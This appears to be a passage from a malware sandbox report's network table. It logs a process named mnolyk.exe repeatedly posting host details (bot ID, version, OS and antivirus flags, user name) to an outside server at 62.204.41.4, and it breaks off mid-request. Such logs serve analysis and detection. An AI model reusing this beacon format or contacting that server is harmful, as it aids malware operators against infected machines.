                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      633192.168.2.75036262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:49.786550999 CET1100OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.850887060 CET1100INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      634192.168.2.75036362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:50.019718885 CET1101OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.084964991 CET1101INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      635192.168.2.75036462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:50.253164053 CET1102OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.316068888 CET1102INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      636192.168.2.75036562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:50.493705034 CET1103OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.557642937 CET1103INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      637192.168.2.75036662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:50.739823103 CET1104OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.806164980 CET1104INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      64192.168.2.74978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:13.130119085 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.194447041 CET503INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      65192.168.2.74979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:13.365591049 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.429371119 CET504INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      66192.168.2.74979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:13.602771044 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.666631937 CET505INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      67192.168.2.74979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:13.832897902 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.896177053 CET506INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      68192.168.2.74979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:14.067336082 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.132473946 CET507INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      69192.168.2.74979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:14.301275015 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.363877058 CET508INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.74973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:58.287698030 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:58.349608898 CET439INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      70192.168.2.74979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:14.536822081 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.600203991 CET509INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      71192.168.2.74979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:14.772958994 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.838946104 CET510INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      72192.168.2.74979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:15.167905092 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.234064102 CET511INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      73192.168.2.74979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:15.438756943 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.502535105 CET512INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      74192.168.2.74979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:15.767937899 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.831954956 CET513INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      75192.168.2.74980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:16.519326925 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:16.584275961 CET514INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      76192.168.2.74980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:16.822546959 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:16.886051893 CET515INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      77192.168.2.74980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:18.022305965 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
